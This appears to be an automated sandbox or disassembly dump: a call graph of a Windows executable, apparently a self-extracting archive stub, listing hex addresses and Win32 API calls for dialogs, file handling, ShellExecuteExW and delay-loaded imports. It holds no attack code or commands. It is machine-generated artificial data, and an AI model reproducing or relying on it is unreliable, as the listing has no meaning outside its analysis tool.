23847->23852 24079 d7cb5a 23849->24079 23856 d7b010 IsDialogMessageW 23850->23856 23850->23878 23851->23878 23853 d7b57b SetDlgItemTextW 23852->23853 23858 d7b58f 23853->23858 23856->23842 23860 d7b01f TranslateMessage DispatchMessageW 23856->23860 23861 d6ddd1 53 API calls 23857->23861 23863 d6ddd1 53 API calls 23858->23863 23860->23842 23862 d7b124 23861->23862 23865 d6400a _swprintf 51 API calls 23862->23865 23866 d7b5b8 23863->23866 23864 d7b6af 23870 d7b6df 23864->23870 23874 d6ddd1 53 API calls 23864->23874 23871 d7b136 23865->23871 23872 d6ddd1 53 API calls 23866->23872 23867 d7b0e6 23983 d6a04f 23867->23983 23869 d7bdf5 98 API calls 23869->23864 23877 d7bdf5 98 API calls 23870->23877 23910 d7b797 23870->23910 23876 d7cb5a 16 API calls 23871->23876 23872->23878 23875 d7b6c2 SetDlgItemTextW 23874->23875 23882 d6ddd1 53 API calls 23875->23882 23876->23867 23883 d7b6fa 23877->23883 23879 d7b847 23884 d7b850 EnableWindow 23879->23884 23885 d7b859 23879->23885 23880 d7b174 GetLastError 23881 d7b17f 23880->23881 23989 d7a322 SetCurrentDirectoryW 23881->23989 23887 d7b6d6 SetDlgItemTextW 23882->23887 23893 d7b70c 23883->23893 23909 d7b731 23883->23909 23884->23885 23888 d7b876 23885->23888 24097 d612c8 GetDlgItem EnableWindow 23885->24097 23887->23870 23892 d7b89d 23888->23892 23901 d7b895 SendMessageW 23888->23901 23889 d7b195 23890 d7b1ac 23889->23890 23891 d7b19e GetLastError 23889->23891 23900 d7b227 23890->23900 23904 d7b237 23890->23904 23906 d7b1c4 GetTickCount 23890->23906 23891->23890 23892->23878 23902 d6ddd1 53 API calls 23892->23902 24095 d79635 32 API calls 23893->24095 23894 d7b78a 23896 d7bdf5 98 API calls 23894->23896 23896->23910 23898 d7b86c 24098 d612c8 GetDlgItem EnableWindow 23898->24098 23900->23904 23905 d7b46c 23900->23905 23901->23892 23908 d7b8b6 SetDlgItemTextW 23902->23908 23903 d7b725 23903->23909 23912 d7b407 23904->23912 23913 d7b24f GetModuleFileNameW 23904->23913 23998 d612e6 GetDlgItem ShowWindow 23905->23998 23914 d6400a _swprintf 51 API calls 23906->23914 23907 d7b825 24096 d79635 32 API calls 23907->24096 23908->23878 23909->23894 23916 d7bdf5 98 API calls 23909->23916 23910->23879 23910->23907 23917 d6ddd1 53 API calls 23910->23917 23912->23826 23925 d6ddd1 53 API calls 23912->23925 24089 d6eb3a 80 API calls 23913->24089 23920 d7b1dd 23914->23920 23922 d7b75f 23916->23922 23917->23910 23918 d7b47c 23999 d612e6 GetDlgItem ShowWindow 23918->23999 23990 d6971e 23920->23990 23921 d7b844 23921->23879 23922->23894 23926 d7b768 DialogBoxParamW 23922->23926 23924 d7b275 23928 d6400a _swprintf 51 API calls 23924->23928 23929 d7b41b 23925->23929 23926->23826 23926->23894 23927 d7b486 23930 d6ddd1 53 API calls 23927->23930 23931 d7b297 CreateFileMappingW 23928->23931 23932 d6400a _swprintf 51 API calls 23929->23932 23934 d7b490 SetDlgItemTextW 23930->23934 23935 d7b376 __vsnwprintf_l 23931->23935 23936 d7b2f9 GetCommandLineW 23931->23936 23937 d7b439 23932->23937 24000 d612e6 GetDlgItem ShowWindow 23934->24000 23939 d7b381 ShellExecuteExW 23935->23939 23941 d7b30a 23936->23941 23951 d6ddd1 53 API calls 23937->23951 23938 d7b203 23942 d7b20a GetLastError 23938->23942 23943 d7b215 23938->23943 23944 d7b39e 23939->23944 24090 d7ab2e SHGetMalloc 23941->24090 23942->23943 23947 d69653 79 API calls 23943->23947 23957 d7b3e1 23944->23957 23966 d7b3cd Sleep 23944->23966 23945 d7b4a2 SetDlgItemTextW GetDlgItem 23948 d7b4d7 23945->23948 23949 d7b4bf GetWindowLongW SetWindowLongW 23945->23949 23947->23900 24001 d7bdf5 23948->24001 23949->23948 23950 d7b326 24091 d7ab2e SHGetMalloc 23950->24091 23951->23826 23954 d7b332 24092 d7ab2e SHGetMalloc 23954->24092 23957->23912 23963 d7b3f7 UnmapViewOfFile CloseHandle 23957->23963 23958 d7bdf5 98 API calls 23959 d7b4f3 23958->23959 24026 d7d0f5 23959->24026 23960 d7b33e 24093 d6ecad 80 API calls ___scrt_get_show_window_mode 23960->24093 23963->23912 23965 d7b355 MapViewOfFile 23965->23935 23966->23944 23966->23957 23967 d7bdf5 98 API calls 23970 d7b519 23967->23970 23968 d7b542 24094 d612c8 GetDlgItem EnableWindow 23968->24094 23970->23968 23972 d7bdf5 98 API calls 23970->23972 23971->23826 23971->23847 23972->23968 23974 d61314 23973->23974 23975 d6136d 23973->23975 23977 d6137a 23974->23977 24099 d6da98 62 API calls 2 library calls 23974->24099 24100 d6da71 GetWindowLongW SetWindowLongW 23975->24100 23977->23814 23977->23815 23977->23878 23979 d61336 23979->23977 23980 d61349 GetDlgItem 23979->23980 23980->23977 23981 d61359 23980->23981 23981->23977 23982 d6135f SetWindowTextW 23981->23982 23982->23977 23986 d6a059 23983->23986 23984 d6a0ea 23985 d6a207 9 API calls 23984->23985 23987 d6a113 23984->23987 23985->23987 23986->23984 23986->23987 24101 d6a207 23986->24101 23987->23880 23987->23881 23989->23889 23991 d69728 23990->23991 23992 d69786 23991->23992 23993 d69792 CreateFileW 23991->23993 23994 d6b66c 2 API calls 23992->23994 23995 d697e4 23992->23995 23993->23992 23996 d697cb 23994->23996 23995->23938 23996->23995 23997 d697cf CreateFileW 23996->23997 23997->23995 23998->23918 23999->23927 24000->23945 24002 d7bdff __EH_prolog 24001->24002 24003 d7b4e5 24002->24003 24133 d7aa36 24002->24133 24003->23958 24006 d7aa36 ExpandEnvironmentStringsW 24015 d7be36 _wcsrchr 24006->24015 24007 d7c11d SetWindowTextW 24007->24015 24012 d7bf0b SetFileAttributesW 24014 d7bfc5 GetFileAttributesW 24012->24014 24025 d7bf25 ___scrt_get_show_window_mode 24012->24025 24014->24015 24016 d7bfd7 DeleteFileW 24014->24016 24015->24003 24015->24006 24015->24007 24015->24012 24018 d7c2e7 GetDlgItem SetWindowTextW SendMessageW 24015->24018 24021 d7c327 SendMessageW 24015->24021 24137 d717ac CompareStringW 24015->24137 24138 d79da4 GetCurrentDirectoryW 24015->24138 24140 d6a52a 7 API calls 24015->24140 24141 d6a4b3 FindClose 24015->24141 24142 d7ab9a 76 API calls new 24015->24142 24143 d835de 24015->24143 24016->24015 24019 d7bfe8 24016->24019 24018->24015 24020 d6400a _swprintf 51 API calls 24019->24020 24022 d7c008 GetFileAttributesW 24020->24022 24021->24015 24022->24019 24023 d7c01d MoveFileW 24022->24023 24023->24015 24024 d7c035 MoveFileExW 24023->24024 24024->24015 24025->24014 24025->24015 24139 d6b4f7 52 API calls 2 library calls 24025->24139 24027 d7d0ff __EH_prolog 24026->24027 24158 d6fead 24027->24158 24029 d7d130 24162 d65c59 24029->24162 24031 d7d14e 24166 d67c68 24031->24166 24035 d7d1a1 24183 d67cfb 24035->24183 24037 d7b504 24037->23967 24039 d7cd38 24038->24039 24040 d79d1a 4 API calls 24039->24040 24041 d7cd3d 24040->24041 24042 d7b5d1 24041->24042 24043 d7cd45 GetWindow 24041->24043 24042->23822 24042->23823 24043->24042 24044 d7cd65 24043->24044 24044->24042 24045 d7cd72 GetClassNameW 24044->24045 24047 d7cd96 GetWindowLongW 24044->24047 24048 d7cdfa GetWindow 24044->24048 24617 d717ac CompareStringW 24045->24617 24047->24048 24049 d7cda6 SendMessageW 24047->24049 24048->24042 24048->24044 24049->24048 24050 d7cdbc GetObjectW 24049->24050 24618 d79d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24050->24618 24052 d7cdd3 24619 d79d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24052->24619 24620 d79f5d 8 API calls ___scrt_get_show_window_mode 24052->24620 24055 d7cde4 SendMessageW DeleteObject 24055->24048 24056->23834 24058 d7a2e8 24057->24058 24064 d7a30d 24057->24064 24621 d717ac CompareStringW 24058->24621 24059 d7a312 SHAutoComplete 24060 d7a31b 24059->24060 24065 d7a7c3 24060->24065 24062 d7a2fb 24063 d7a2ff FindWindowExW 24062->24063 24062->24064 24063->24064 24064->24059 24064->24060 24066 d7a7cd __EH_prolog 24065->24066 24067 d61380 82 API calls 24066->24067 24068 d7a7ef 24067->24068 24622 d61f4f 24068->24622 24071 d7a809 24073 d61631 84 API calls 24071->24073 24072 d7a818 24074 d61951 126 API calls 24072->24074 24075 d7a814 24073->24075 24077 d7a83a __vsnwprintf_l new 24074->24077 24075->23864 24075->23869 24076 d61631 84 API calls 24076->24075 24077->24075 24077->24076 24078->23846 24080 d7ac74 5 API calls 24079->24080 24081 d7cb66 GetDlgItem 24080->24081 24082 d7cbbc SendMessageW SendMessageW 24081->24082 24083 d7cb88 24081->24083 24084 d7cc17 SendMessageW SendMessageW SendMessageW 24082->24084 24085 d7cbf8 24082->24085 24086 d7cb93 ShowWindow SendMessageW SendMessageW 24083->24086 24087 d7cc6d SendMessageW 24084->24087 24088 d7cc4a SendMessageW 24084->24088 24085->24084 24086->24082 24087->23867 24088->24087 24089->23924 24090->23950 24091->23954 24092->23960 24093->23965 24094->23971 24095->23903 24096->23921 24097->23898 24098->23888 24099->23979 24100->23977 24102 d6a214 24101->24102 24103 d6a238 24102->24103 24104 d6a22b CreateDirectoryW 24102->24104 24122 d6a180 24103->24122 24104->24103 24106 d6a26b 24104->24106 24111 d6a27a 24106->24111 24114 d6a444 24106->24114 24108 d6a27e GetLastError 24108->24111 24109 d6b66c 2 API calls 24112 d6a254 24109->24112 24111->23986 24112->24108 24113 d6a258 CreateDirectoryW 24112->24113 24113->24106 24113->24108 24115 d7e360 24114->24115 24116 d6a451 SetFileAttributesW 24115->24116 24117 d6a467 24116->24117 24118 d6a494 24116->24118 24119 d6b66c 2 API calls 24117->24119 24118->24111 24120 d6a47b 24119->24120 24120->24118 24121 d6a47f SetFileAttributesW 24120->24121 24121->24118 24125 d6a194 24122->24125 24126 d7e360 24125->24126 24127 d6a1a1 GetFileAttributesW 24126->24127 24128 d6a1b2 24127->24128 24129 d6a189 24127->24129 24130 d6b66c 2 API calls 24128->24130 24129->24108 24129->24109 24131 d6a1c6 24130->24131 24131->24129 24132 d6a1ca GetFileAttributesW 24131->24132 24132->24129 24134 d7aa40 24133->24134 24135 d7ab16 24134->24135 24136 d7aaf3 ExpandEnvironmentStringsW 24134->24136 24135->24015 24136->24135 24137->24015 24138->24015 24139->24025 24140->24015 24141->24015 24142->24015 24144 d88606 24143->24144 24145 d8861e 24144->24145 24146 d88613 24144->24146 24147 d8862f FindHandler 24145->24147 24148 d88626 24145->24148 24149 d88518 __vsnwprintf_l 21 API calls 24146->24149 24151 d88659 HeapReAlloc 24147->24151 24152 d88634 24147->24152 24157 d871ad 7 API calls 2 library calls 24147->24157 24150 d884de _free 20 API calls 24148->24150 24153 d8861b 24149->24153 24150->24153 24151->24147 24151->24153 24156 d8895a 20 API calls _abort 24152->24156 24153->24015 24156->24153 24157->24147 24159 d6feba 24158->24159 24187 d61789 24159->24187 24161 d6fed2 24161->24029 24163 d6fead 24162->24163 24164 d61789 76 API calls 24163->24164 24165 d6fed2 24164->24165 24165->24031 24167 d67c72 __EH_prolog 24166->24167 24204 d6c827 24167->24204 24169 d67c8d 24170 d7e24a new 8 API calls 24169->24170 24171 d67cb7 24170->24171 24210 d7440b 24171->24210 24174 d67ddf 24175 d67de9 24174->24175 24176 d67e53 24175->24176 24239 d6a4c6 24175->24239 24178 d67ec4 24176->24178 24181 d6a4c6 8 API calls 24176->24181 24217 d6837f 24176->24217 24179 d67f06 24178->24179 24245 d66dc1 74 API calls 24178->24245 24179->24035 24181->24176 24184 d67d09 24183->24184 24186 d67d10 24183->24186 24185 d71acf 84 API calls 24184->24185 24185->24186 24188 d6179f 24187->24188 24199 d617fa __vsnwprintf_l 24187->24199 24189 d617c8 24188->24189 24200 d66e91 74 API calls __vswprintf_c_l 24188->24200 24190 d61827 24189->24190 24196 d617e7 new 24189->24196 24192 d835de 22 API calls 24190->24192 24194 d6182e 24192->24194 24193 d617be 24201 d66efd 75 API calls 24193->24201 24194->24199 24203 d66efd 75 API calls 24194->24203 24196->24199 24202 d66efd 75 API calls 24196->24202 24199->24161 24200->24193 24201->24189 24202->24199 24203->24199 24205 d6c831 __EH_prolog 24204->24205 24206 d7e24a new 8 API calls 24205->24206 24207 d6c874 24206->24207 24208 d7e24a new 8 API calls 24207->24208 24209 d6c898 24208->24209 24209->24169 24211 d74415 __EH_prolog 24210->24211 24212 d7e24a new 8 API calls 24211->24212 24213 d74431 24212->24213 24214 d67ce6 24213->24214 24216 d706ba 78 API calls 24213->24216 24214->24174 24216->24214 24218 d68389 __EH_prolog 24217->24218 24246 d61380 24218->24246 24220 d683a4 24254 d69ef7 24220->24254 24226 d683d3 24374 d61631 24226->24374 24230 d684ce 24277 d61f00 24230->24277 24231 d683cf 24231->24226 24235 d6a4c6 8 API calls 24231->24235 24237 d6846e 24231->24237 24378 d6bac4 CompareStringW 24231->24378 24235->24231 24273 d68517 24237->24273 24238 d684d9 24238->24226 24281 d63aac 24238->24281 24291 d6857b 24238->24291 24240 d6a4db 24239->24240 24244 d6a4df 24240->24244 24605 d6a5f4 24240->24605 24242 d6a4ef 24243 d6a4f4 FindClose 24242->24243 24242->24244 24243->24244 24244->24175 24245->24179 24247 d61385 __EH_prolog 24246->24247 24248 d6c827 8 API calls 24247->24248 24249 d613bd 24248->24249 24250 d7e24a new 8 API calls 24249->24250 24253 d61416 ___scrt_get_show_window_mode 24249->24253 24251 d61403 24250->24251 24252 d6b07d 82 API calls 24251->24252 24251->24253 24252->24253 24253->24220 24255 d69f0e 24254->24255 24256 d683ba 24255->24256 24380 d66f5d 76 API calls 24255->24380 24256->24226 24258 d619a6 24256->24258 24259 d619b0 __EH_prolog 24258->24259 24269 d61a00 24259->24269 24271 d619e5 24259->24271 24381 d6709d 24259->24381 24261 d61b60 24264 d63aac 97 API calls 24261->24264 24261->24271 24262 d61b50 24384 d66dc1 74 API calls 24262->24384 24266 d61bb3 24264->24266 24265 d61bff 24265->24271 24272 d61c32 24265->24272 24385 d66dc1 74 API calls 24265->24385 24266->24265 24268 d63aac 97 API calls 24266->24268 24268->24266 24269->24261 24269->24262 24269->24271 24270 d63aac 97 API calls 24270->24272 24271->24231 24272->24270 24272->24271 24274 d68524 24273->24274 24403 d70c26 GetSystemTime SystemTimeToFileTime 24274->24403 24276 d68488 24276->24230 24379 d71359 72 API calls 24276->24379 24279 d61f05 __EH_prolog 24277->24279 24278 d61f39 24278->24238 24279->24278 24405 d61951 24279->24405 24282 d63ab8 24281->24282 24283 d63abc 24281->24283 24282->24238 24284 d63af7 24283->24284 24285 d63ae9 24283->24285 24540 d627e8 97 API calls 3 library calls 24284->24540 24287 d63b29 24285->24287 24539 d63281 85 API calls 3 library calls 24285->24539 24287->24238 24289 d63af5 24289->24287 24541 d6204e 74 API calls 24289->24541 24292 d68585 __EH_prolog 24291->24292 24293 d685be 24292->24293 24309 d685c2 24292->24309 24564 d784bd 99 API calls 24292->24564 24294 d685e7 24293->24294 24299 d6867a 24293->24299 24293->24309 24296 d68609 24294->24296 24294->24309 24565 d67b66 151 API calls 24294->24565 24296->24309 24566 d784bd 99 API calls 24296->24566 24299->24309 24542 d65e3a 24299->24542 24301 d68705 24301->24309 24548 d6826a 24301->24548 24304 d68875 24305 d6a4c6 8 API calls 24304->24305 24307 d688e0 24304->24307 24305->24307 24306 d6c991 80 API calls 24317 d6893b _memcmp 24306->24317 24552 d67d6c 24307->24552 24309->24238 24310 d68a70 24311 d68b43 24310->24311 24318 d68abf 24310->24318 24315 d68b9e 24311->24315 24328 d68b4e 24311->24328 24312 d68a69 24569 d61f94 74 API calls 24312->24569 24325 d68b30 24315->24325 24572 d680ea 96 API calls 24315->24572 24316 d68b9c 24321 d69653 79 API calls 24316->24321 24317->24306 24317->24309 24317->24310 24317->24312 24567 d68236 82 API calls 24317->24567 24568 d61f94 74 API calls 24317->24568 24322 d6a180 4 API calls 24318->24322 24318->24325 24320 d69653 79 API calls 24320->24309 24321->24309 24323 d68af7 24322->24323 24323->24325 24570 d69377 96 API calls 24323->24570 24324 d68c09 24327 d69989 GetFileType 24324->24327 24337 d68c74 24324->24337 24373 d691c1 __except_handler4 24324->24373 24325->24316 24325->24324 24326 d6aa88 8 API calls 24329 d68cc3 24326->24329 24331 d68c4c 24327->24331 24328->24316 24571 d67f26 100 API calls __except_handler4 24328->24571 24333 d6aa88 8 API calls 24329->24333 24331->24337 24573 d61f94 74 API calls 24331->24573 24350 d68cd9 24333->24350 24335 d68c62 24574 d67061 75 API calls 24335->24574 24337->24326 24338 d68df7 24341 d68e69 24338->24341 24342 d68e07 24338->24342 24339 d68efd 24344 d68f23 24339->24344 24345 d68f0f 24339->24345 24361 d68e27 24339->24361 24340 d68d9c 24340->24338 24340->24339 24343 d6826a CharUpperW 24341->24343 24346 d68e4d 24342->24346 24354 d68e15 24342->24354 24347 d68e84 24343->24347 24349 d72c42 75 API calls 24344->24349 24348 d692e6 121 API calls 24345->24348 24346->24361 24577 d67907 108 API calls 24346->24577 24357 d68eb4 24347->24357 24358 d68ead 24347->24358 24347->24361 24348->24361 24352 d68f3c 24349->24352 24350->24340 24575 d69b21 SetFilePointer GetLastError SetEndOfFile 24350->24575 24580 d728f1 121 API calls 24352->24580 24576 d61f94 74 API calls 24354->24576 24579 d69224 94 API calls __EH_prolog 24357->24579 24578 d67698 84 API calls __except_handler4 24358->24578 24364 d6904b 24361->24364 24581 d61f94 74 API calls 24361->24581 24363 d69156 24366 d6a444 4 API calls 24363->24366 24363->24373 24364->24363 24365 d69104 24364->24365 24364->24373 24558 d69ebf SetEndOfFile 24364->24558 24559 d69d62 24365->24559 24369 d691b1 24366->24369 24369->24373 24582 d61f94 74 API calls 24369->24582 24370 d6914b 24372 d696d0 75 API calls 24370->24372 24372->24363 24373->24320 24375 d61643 24374->24375 24597 d6c8ca 24375->24597 24378->24231 24379->24230 24380->24256 24386 d616d2 24381->24386 24383 d670b9 24383->24269 24384->24271 24385->24272 24387 d616e8 24386->24387 24398 d61740 __vsnwprintf_l 24386->24398 24388 d61711 24387->24388 24399 d66e91 74 API calls __vswprintf_c_l 24387->24399 24389 d61767 24388->24389 24395 d6172d new 24388->24395 24391 d835de 22 API calls 24389->24391 24393 d6176e 24391->24393 24392 d61707 24400 d66efd 75 API calls 24392->24400 24393->24398 24402 d66efd 75 API calls 24393->24402 24395->24398 24401 d66efd 75 API calls 24395->24401 24398->24383 24399->24392 24400->24388 24401->24398 24402->24398 24404 d70c56 __vsnwprintf_l 24403->24404 24404->24276 24406 d61961 24405->24406 24407 d6195d 24405->24407 24409 d61896 24406->24409 24407->24278 24410 d618a8 24409->24410 24411 d618e5 24409->24411 24412 d63aac 97 API calls 24410->24412 24417 d63f18 24411->24417 24415 d618c8 24412->24415 24415->24407 24421 d63f21 24417->24421 24418 d63aac 97 API calls 24418->24421 24419 d61906 24419->24415 24422 d61e00 24419->24422 24421->24418 24421->24419 24434 d7067c 24421->24434 24423 d61e0a __EH_prolog 24422->24423 24442 d63b3d 24423->24442 24425 d61e34 24426 d616d2 76 API calls 24425->24426 24428 d61ebb 24425->24428 24427 d61e4b 24426->24427 24470 d61849 76 API calls 24427->24470 24428->24415 24430 d61e63 24432 d61e6f 24430->24432 24471 d7137a MultiByteToWideChar 24430->24471 24472 d61849 76 API calls 24432->24472 24435 d70683 24434->24435 24436 d7069e 24435->24436 24440 d66e8c RaiseException FindHandler 24435->24440 24438 d706af SetThreadExecutionState 24436->24438 24441 d66e8c RaiseException FindHandler 24436->24441 24438->24421 24440->24436 24441->24438 24443 d63b47 __EH_prolog 24442->24443 24444 d63b5d 24443->24444 24445 d63b79 24443->24445 24501 d66dc1 74 API calls 24444->24501 24447 d63dc2 24445->24447 24450 d63ba5 24445->24450 24518 d66dc1 74 API calls 24447->24518 24449 d63b68 24449->24425 24450->24449 24473 d72c42 24450->24473 24452 d63c26 24454 d63cb1 24452->24454 24469 d63c1d 24452->24469 24504 d6c991 24452->24504 24453 d63c22 24453->24452 24503 d62034 76 API calls 24453->24503 24486 d6aa88 24454->24486 24456 d63bf4 24456->24452 24456->24453 24457 d63c12 24456->24457 24502 d66dc1 74 API calls 24457->24502 24459 d63cc4 24463 d63d3e 24459->24463 24464 d63d48 24459->24464 24490 d692e6 24463->24490 24510 d728f1 121 API calls 24464->24510 24467 d63d46 24467->24469 24511 d61f94 74 API calls 24467->24511 24512 d71acf 24469->24512 24470->24430 24471->24432 24472->24428 24474 d72c51 24473->24474 24477 d72c5b 24473->24477 24519 d66efd 75 API calls 24474->24519 24476 d72ca2 new 24479 d72da9 Concurrency::cancel_current_task 24476->24479 24480 d72cd9 24476->24480 24485 d72cfd ___scrt_get_show_window_mode 24476->24485 24477->24476 24478 d72c9d Concurrency::cancel_current_task 24477->24478 24477->24485 24521 d8157a RaiseException 24478->24521 24522 d8157a RaiseException 24479->24522 24520 d72b7b 75 API calls 4 library calls 24480->24520 24484 d72dc1 24485->24456 24487 d6aa95 24486->24487 24489 d6aa9f 24486->24489 24488 d7e24a new 8 API calls 24487->24488 24488->24489 24489->24459 24491 d692f0 __EH_prolog 24490->24491 24523 d67dc6 24491->24523 24494 d6709d 76 API calls 24495 d69302 24494->24495 24526 d6ca6c 24495->24526 24497 d6935c 24497->24467 24499 d6ca6c 114 API calls 24500 d69314 24499->24500 24500->24497 24500->24499 24535 d6cc51 97 API calls __vsnwprintf_l 24500->24535 24501->24449 24502->24469 24503->24452 24505 d6c9c4 24504->24505 24506 d6c9b2 24504->24506 24537 d66249 80 API calls 24505->24537 24536 d66249 80 API calls 24506->24536 24509 d6c9bc 24509->24454 24510->24467 24511->24469 24513 d71ad9 24512->24513 24514 d71af2 24513->24514 24517 d71b06 24513->24517 24538 d7075b 84 API calls 24514->24538 24516 d71af9 24516->24517 24518->24449 24519->24477 24520->24485 24521->24479 24522->24484 24524 d6acf5 GetVersionExW 24523->24524 24525 d67dcb 24524->24525 24525->24494 24532 d6ca82 __vsnwprintf_l 24526->24532 24527 d6cbf7 24528 d6ca0b 6 API calls 24527->24528 24529 d6cc1f 24527->24529 24528->24529 24530 d7067c SetThreadExecutionState RaiseException 24529->24530 24533 d6cbee 24530->24533 24531 d784bd 99 API calls 24531->24532 24532->24527 24532->24531 24532->24533 24534 d6ab70 89 API calls 24532->24534 24533->24500 24534->24532 24535->24500 24536->24509 24537->24509 24538->24516 24539->24289 24540->24289 24541->24287 24543 d65e4a 24542->24543 24583 d65d67 24543->24583 24546 d65e7d 24547 d65eb5 24546->24547 24588 d6ad65 CharUpperW CompareStringW 24546->24588 24547->24301 24549 d68289 24548->24549 24594 d7179d CharUpperW 24549->24594 24551 d68333 24551->24304 24553 d67d7b 24552->24553 24554 d67dbb 24553->24554 24595 d67043 74 API calls 24553->24595 24554->24317 24556 d67db3 24596 d66dc1 74 API calls 24556->24596 24558->24365 24560 d69d73 24559->24560 24562 d69d82 24559->24562 24561 d69d79 FlushFileBuffers 24560->24561 24560->24562 24561->24562 24563 d69dfb SetFileTime 24562->24563 24563->24370 24564->24293 24565->24296 24566->24309 24567->24317 24568->24317 24569->24310 24570->24325 24571->24316 24572->24325 24573->24335 24574->24337 24575->24340 24576->24361 24577->24361 24578->24361 24579->24361 24580->24361 24581->24364 24582->24373 24589 d65c64 24583->24589 24585 d65d88 24585->24546 24587 d65c64 2 API calls 24587->24585 24588->24546 24592 d65c6e 24589->24592 24590 d65d56 24590->24585 24590->24587 24592->24590 24593 d6ad65 CharUpperW CompareStringW 24592->24593 24593->24592 24594->24551 24595->24556 24596->24554 24598 d6c8db 24597->24598 24603 d6a90e 84 API calls 24598->24603 24600 d6c90d 24604 d6a90e 84 API calls 24600->24604 24602 d6c918 24603->24600 24604->24602 24606 d6a5fe 24605->24606 24607 d6a691 FindNextFileW 24606->24607 24608 d6a621 FindFirstFileW 24606->24608 24610 d6a6b0 24607->24610 24611 d6a69c GetLastError 24607->24611 24609 d6a638 24608->24609 24616 d6a675 24608->24616 24612 d6b66c 2 API calls 24609->24612 24610->24616 24611->24610 24613 d6a64d 24612->24613 24614 d6a651 FindFirstFileW 24613->24614 24615 d6a66a GetLastError 24613->24615 24614->24615 24614->24616 24615->24616 24616->24242 24617->24044 24618->24052 24619->24052 24620->24055 24621->24062 24623 d69ef7 76 API calls 24622->24623 24624 d61f5b 24623->24624 24625 d619a6 97 API calls 24624->24625 24628 d61f78 24624->24628 24626 d61f68 24625->24626 24626->24628 24629 d66dc1 74 API calls 24626->24629 24628->24071 24628->24072 24629->24628 24767 d7b8e0 93 API calls _swprintf 24768 d78ce0 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24771 d916e0 CloseHandle 24634 d7d997 24635 d7d89b 24634->24635 24636 d7df59 ___delayLoadHelper2@8 19 API calls 24635->24636 24636->24635 24638 d7d891 19 API calls ___delayLoadHelper2@8 24773 d77090 114 API calls 24774 d7cc90 70 API calls 24825 d7a990 97 API calls 24826 d79b90 GdipCloneImage GdipAlloc 24827 d89b90 21 API calls 2 library calls 24776 d7a89d 78 API calls 24777 d6ea98 FreeLibrary 24828 d82397 48 API calls 24778 d8ac0e 27 API calls ___delayLoadHelper2@8 24645 d61385 82 API calls 3 library calls 24831 d85780 QueryPerformanceFrequency QueryPerformanceCounter 24781 d876bd 52 API calls 3 library calls 24782 d616b0 84 API calls 24715 d890b0 24723 d8a56f 24715->24723 24719 d890cc 24720 d890d9 24719->24720 24731 d890e0 11 API calls 24719->24731 24722 d890c4 24724 d8a458 _abort 5 API calls 24723->24724 24725 d8a596 24724->24725 24726 d8a5ae TlsAlloc 24725->24726 24727 d8a59f 24725->24727 24726->24727 24728 d7ec4a ___delayLoadHelper2@8 5 API calls 24727->24728 24729 d890ba 24728->24729 24729->24722 24730 d89029 20 API calls 3 library calls 24729->24730 24730->24719 24731->24722 24732 d8a3b0 24733 d8a3bb 24732->24733 24734 d8a6ca 11 API calls 24733->24734 24735 d8a3e4 24733->24735 24736 d8a3e0 24733->24736 24734->24733 24738 d8a410 DeleteCriticalSection 24735->24738 24738->24736 24783 d81eb0 6 API calls 3 library calls 24834 d879b7 55 API calls _free 24784 d7e4a2 38 API calls 2 library calls 24785 d696a0 79 API calls 24835 d8e9a0 51 API calls 24837 d79b50 GdipDisposeImage GdipFree __except_handler4 24790 d88050 8 API calls ___vcrt_uninitialize 23698 d7dc5d 23699 d7dc2e 23698->23699 23701 d7df59 23699->23701 23729 d7dc67 23701->23729 23703 d7df73 23704 d7dfd0 23703->23704 23715 d7dff4 23703->23715 23705 d7ded7 DloadReleaseSectionWriteAccess 11 API calls 23704->23705 23706 d7dfdb RaiseException 23705->23706 23724 d7e1c9 23706->23724 23707 d7e06c LoadLibraryExA 23709 d7e07f GetLastError 23707->23709 23710 d7e0cd 23707->23710 23708 d7ec4a ___delayLoadHelper2@8 5 API calls 23711 d7e1d8 23708->23711 23716 d7e092 23709->23716 23717 d7e0a8 23709->23717 23714 d7e0d8 FreeLibrary 23710->23714 23718 d7e0df 23710->23718 23711->23699 23712 d7e13d GetProcAddress 23713 d7e19b 23712->23713 23720 d7e14d GetLastError 23712->23720 23740 d7ded7 23713->23740 23714->23718 23715->23707 23715->23710 23715->23713 23715->23718 23716->23710 23716->23717 23719 d7ded7 DloadReleaseSectionWriteAccess 11 API calls 23717->23719 23718->23712 23718->23713 23721 d7e0b3 RaiseException 23719->23721 23722 d7e160 23720->23722 23721->23724 23722->23713 23725 d7ded7 DloadReleaseSectionWriteAccess 11 API calls 23722->23725 23724->23708 23726 d7e181 RaiseException 23725->23726 23727 d7dc67 ___delayLoadHelper2@8 11 API calls 23726->23727 23728 d7e198 23727->23728 23728->23713 23730 d7dc73 23729->23730 23731 d7dc99 23729->23731 23748 d7dd15 23730->23748 23731->23703 23734 d7dc94 23758 d7dc9a 23734->23758 23737 d7ec4a ___delayLoadHelper2@8 5 API calls 23738 d7df55 23737->23738 23738->23703 23739 d7df24 23739->23737 23741 d7df0b 23740->23741 23742 d7dee9 23740->23742 23741->23724 23743 d7dd15 DloadLock 8 API calls 23742->23743 23744 d7deee 23743->23744 23745 d7df06 23744->23745 23746 d7de67 DloadProtectSection 3 API calls 23744->23746 23767 d7df0f 8 API calls 2 library calls 23745->23767 23746->23745 23749 d7dc9a DloadUnlock 3 API calls 23748->23749 23750 d7dd2a 23749->23750 23751 d7ec4a ___delayLoadHelper2@8 5 API calls 23750->23751 23752 d7dc78 23751->23752 23752->23734 23753 d7de67 23752->23753 23756 d7de7c DloadObtainSection 23753->23756 23754 d7de82 23754->23734 23755 d7deb7 VirtualProtect 23755->23754 23756->23754 23756->23755 23766 d7dd72 VirtualQuery GetSystemInfo 23756->23766 23759 d7dca7 23758->23759 23760 d7dcab 23758->23760 23759->23739 23761 d7dcb3 GetModuleHandleW 23760->23761 23762 d7dcaf 23760->23762 23763 d7dcc9 GetProcAddress 23761->23763 23765 d7dcc5 23761->23765 23762->23739 23764 d7dcd9 GetProcAddress 23763->23764 23763->23765 23764->23765 23765->23739 23766->23755 23767->23741 23771 d69b59 23772 d69b63 23771->23772 23773 d69bd7 23771->23773 23774 d69bad SetFilePointer 23772->23774 23774->23773 23775 d69bcd GetLastError 23774->23775 23775->23773 24839 d7be49 98 API calls 3 library calls 24792 d7ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24793 d78c40 GetClientRect 24794 d83040 5 API calls 2 library calls 24795 d90040 IsProcessorFeaturePresent 24840 d7d34e DialogBoxParamW 24796 d75c77 121 API calls 